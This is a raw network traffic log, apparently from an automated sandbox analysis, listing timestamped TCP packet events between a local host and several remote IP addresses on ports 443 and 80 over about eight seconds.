                                  Nov 26, 2024 00:29:08.026853085 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.026869059 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.027117968 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.037415028 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.083331108 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.177813053 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.178019047 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.179480076 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.179491997 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.179722071 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.191323996 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.235330105 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.497855902 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.497919083 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.498020887 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.498060942 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.498100996 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.498122931 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.498147011 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.669274092 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.669292927 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.669364929 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.669399977 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.669451952 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.711754084 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.711816072 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.711852074 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.711870909 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.711896896 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.711922884 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.844346046 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.844397068 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.844461918 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.844480038 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.844508886 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.844531059 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.887805939 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.887900114 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.887940884 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.887950897 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.888000965 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.888025999 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.897347927 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.897372961 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.897387981 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.897447109 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.897468090 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.897514105 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.909207106 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.909251928 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.909302950 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.909312010 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.909337044 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.909359932 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.927495956 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.927539110 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.927619934 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.927628994 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:08.927690029 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:08.934454918 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.934500933 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.934525013 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.934535027 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.934556007 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.934699059 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.934699059 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.934725046 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.934725046 CET49766443192.168.2.44.175.87.197
                                  Nov 26, 2024 00:29:08.934737921 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:08.934747934 CET443497664.175.87.197192.168.2.4
                                  Nov 26, 2024 00:29:09.028695107 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.028749943 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.028778076 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.028789043 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.028805017 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.028834105 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.048468113 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.048532963 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.048543930 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.048563957 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.048592091 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.048603058 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.063029051 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.063091040 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.063106060 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.063117027 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.063141108 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.063155890 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.078586102 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.078627110 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.078658104 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.078665972 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.078684092 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.078712940 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.089740038 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.089783907 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.089817047 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.089824915 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.089838982 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.089860916 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.089876890 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.090039968 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.090126038 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.090543032 CET49765443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.090559959 CET4434976513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.144814014 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.144844055 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.144937992 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.145694017 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.145731926 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.145792961 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.146291018 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.146320105 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.146378994 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.146562099 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.146574974 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.146694899 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.146707058 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.147383928 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147391081 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.147443056 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147667885 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147676945 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147680044 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.147684097 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.147741079 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147923946 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147934914 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:09.147944927 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:09.147953987 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.869015932 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.869501114 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.869532108 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.869987011 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.869993925 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.933353901 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.933974981 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.934010029 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.934577942 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.934583902 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.936391115 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.936661005 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.936688900 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.937138081 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.937143087 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.938611984 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.938863993 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.938870907 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.939308882 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.939317942 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.998158932 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.998675108 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.998688936 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:10.999218941 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:10.999222994 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.308878899 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.308962107 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.309062958 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.309098959 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.309151888 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.309320927 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.309326887 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.309345961 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.309773922 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.309855938 CET4434976713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.309915066 CET49767443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.312290907 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.312335014 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.312424898 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.312608957 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.312628031 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.381762028 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.381836891 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382040024 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.382118940 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.382134914 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382170916 CET49768443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.382175922 CET4434976813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382741928 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382765055 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382828951 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.382858992 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.382905006 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.383011103 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.383016109 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.383033037 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.383160114 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.383191109 CET4434976913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.383224964 CET49769443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385144949 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385190964 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.385232925 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385268927 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.385272980 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385329008 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385453939 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385464907 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.385471106 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.385478973 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.387923002 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.387947083 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.387993097 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.388000011 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.388144970 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.388153076 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.388159990 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.388302088 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.388331890 CET4434977113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.388371944 CET49771443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.390081882 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.390100002 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.390156984 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.390268087 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.390275002 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.452475071 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.452537060 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.452591896 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.452785969 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.452800035 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.452810049 CET49770443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.452814102 CET4434977013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.455632925 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.455652952 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:11.455741882 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.455903053 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:11.455910921 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.095556021 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.096087933 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.096108913 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.096704006 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.096709013 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.207190037 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.207817078 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.207844019 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.208306074 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.208311081 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.234430075 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.235038042 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.235061884 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.235349894 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.235354900 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.339653969 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.340322018 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.340352058 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.340624094 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.340687037 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.340693951 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.340912104 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.340938091 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.341238976 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.341243982 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.541374922 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.541567087 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.541671991 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.541704893 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.541723013 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.541733027 CET49773443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.541738987 CET4434977313.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.544624090 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.544667006 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.544761896 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.544929028 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.544946909 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.652172089 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.652333021 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.652462959 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.652498007 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.652520895 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.652556896 CET49776443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.652561903 CET4434977613.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.655198097 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.655237913 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.655333996 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.655452013 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.655462027 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.679141998 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.679204941 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.679400921 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.679423094 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.679435015 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.679444075 CET49777443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.679447889 CET4434977713.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.681771994 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.681792974 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.681869984 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.682013988 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.682023048 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795201063 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795275927 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795476913 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795526028 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795526028 CET49774443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795547009 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795557022 CET4434977413.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795721054 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795788050 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795845032 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795938969 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795950890 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.795962095 CET49775443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.795967102 CET4434977513.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.797801018 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.797825098 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.797864914 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.797883034 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.797894001 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.797930956 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.798053026 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.798060894 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:13.798106909 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:13.798121929 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.319088936 CET804973794.46.180.190192.168.2.4
                                  Nov 26, 2024 00:29:15.319277048 CET4973780192.168.2.494.46.180.190
                                  Nov 26, 2024 00:29:15.331552029 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.332240105 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.332267046 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.332712889 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.332717896 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.349574089 CET4973780192.168.2.494.46.180.190
                                  Nov 26, 2024 00:29:15.349833012 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:15.349862099 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:15.349935055 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:15.350208998 CET49783443192.168.2.4172.217.21.36
                                  Nov 26, 2024 00:29:15.350227118 CET44349783172.217.21.36192.168.2.4
                                  Nov 26, 2024 00:29:15.442667961 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.443190098 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.443213940 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.443640947 CET49779443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.443645000 CET4434977913.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.462500095 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.462764025 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.462785006 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.463109970 CET49780443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.463115931 CET4434978013.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.469542980 CET804973794.46.180.190192.168.2.4
                                  Nov 26, 2024 00:29:15.579684019 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.579751015 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.580100060 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.580127954 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.580151081 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.580174923 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.580555916 CET49782443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.580562115 CET4434978213.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.580642939 CET49781443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.580647945 CET4434978113.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.777245045 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.777426004 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.777493000 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.777614117 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.777631998 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.777641058 CET49778443192.168.2.413.107.246.63
                                  Nov 26, 2024 00:29:15.777646065 CET4434977813.107.246.63192.168.2.4
                                  Nov 26, 2024 00:29:15.780603886 CET49784443192.168.2.413.107.246.63
